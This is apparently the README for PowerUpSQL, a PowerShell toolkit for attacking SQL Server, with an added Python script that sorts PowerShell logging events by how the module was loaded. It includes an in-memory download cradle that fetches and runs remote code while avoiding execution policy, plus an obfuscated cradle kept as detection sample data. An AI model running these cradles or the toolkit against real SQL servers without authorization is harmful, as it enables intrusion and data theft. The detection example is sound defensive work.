PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server
The PowerUpSQL module includes functions that support SQL Server discovery, auditing for common weak configurations, and privilege escalation at scale. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that could be used by administrators to quickly inventory the SQL Servers in their ADS domain.
Below is a list of PowerUpSQL function categories. The categories are loosely mapped to common SQL Server attack workflows. Each page contains a list of the associated functions that can be used during testing.
- Active Directory Recon
- Password Recovery
- Data Exfiltration
- Third Party
git clone https://github.com/NetSPI/PowerUpSQL.git
Setting Up PowerUpSQL
- Option 1: Install it from the PowerShell Gallery. This requires local administrative privileges and will permanently install the module.
Install-Module -Name PowerUpSQL
- Option 2: Download the project and import it. This does not require administrative privileges and will only be imported into the current session. However, it may be blocked by restrictive execution policies.
- Option 3: Load it into a session via a download cradle. This does not require administrative privileges and will only be imported into the current session. It should not be blocked by execution policies.
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
Note: To run as an alternative domain user, use the runas command to launch PowerShell first.
runas /noprofile /netonly /user:domain\user PowerShell.exe
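Each of the three load options above leaves a different trace in PowerShell script block logging (event ID 4104), including the in-memory load that execution policy does not stop. The following is an added example, not part of PowerUpSQL or the original page: a Python triage pass that sorts log records by load method. The record layout, host names, rule names and the example.invalid URL are assumptions made for the illustration.

```python
import re

# Constructed sample records shaped like PowerShell script block logging
# events (event ID 4104); hosts and text are made up for this example.
SAMPLE_EVENTS = [
    {"host": "ws01", "id": 4104, "text": "Install-Module -Name PowerUpSQL"},
    {"host": "ws02", "id": 4104, "text": "import-module .\\PowerUpSQL.psd1"},
    {"host": "ws03", "id": 4104, "text":
     'IEX(New-Object System.Net.WebClient).DownloadString('
     '"https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")'},
    {"host": "ws04", "id": 4104, "text":
     "I`EX (new-object net.webclient).downloadstring('http://example.invalid/PowerUpSQL.ps1')"},
    {"host": "ws05", "id": 4104, "text": "Get-Command -Module PowerUpSQL"},
    {"host": "ws06", "id": 4104, "text": "Get-ChildItem C:\\Temp"},
    {"host": "ws07", "id": 4103, "text": "Install-Module -Name PowerUpSQL"},
]

# One rule per load option on this page, checked in order (assumed rule names).
RULES = [
    ("gallery_install", re.compile(r"\binstall-module\b.*\bpowerupsql\b")),
    ("local_import", re.compile(r"\bimport-module\b.*powerupsql")),
    ("download_cradle", re.compile(
        r"\b(iex|invoke-expression)\b.*downloadstring\(.*powerupsql")),
    ("module_use", re.compile(r"\bpowerupsql\b")),
]

def normalize(text):
    """Lower-case, straighten curly quotes, drop backtick escapes, squeeze spaces."""
    text = text.lower().translate(str.maketrans("“”‘’", "\"\"''"))
    return re.sub(r"\s+", " ", text.replace("`", ""))

def classify(event):
    """Return the first matching rule name, or None for unrelated events."""
    if event.get("id") != 4104:
        return None
    text = normalize(event.get("text", ""))
    for name, pattern in RULES:
        if pattern.search(text):
            return name
    return None

def triage(events):
    """Map host -> rule name for every event that matched a rule."""
    return {e["host"]: hit for e in events if (hit := classify(e))}

if __name__ == "__main__":
    for host, hit in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {hit}")
```

Script block logging has to be enabled on the endpoints for these records to exist, and string matching on the module name only catches unrenamed copies.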
Getting Command Help
- To list functions from the module, type: Get-Command -Module PowerUpSQL
- To list help for a function, type: Get-Help FunctionName
Copyright (c) 2018, NetSPI
All rights reserved.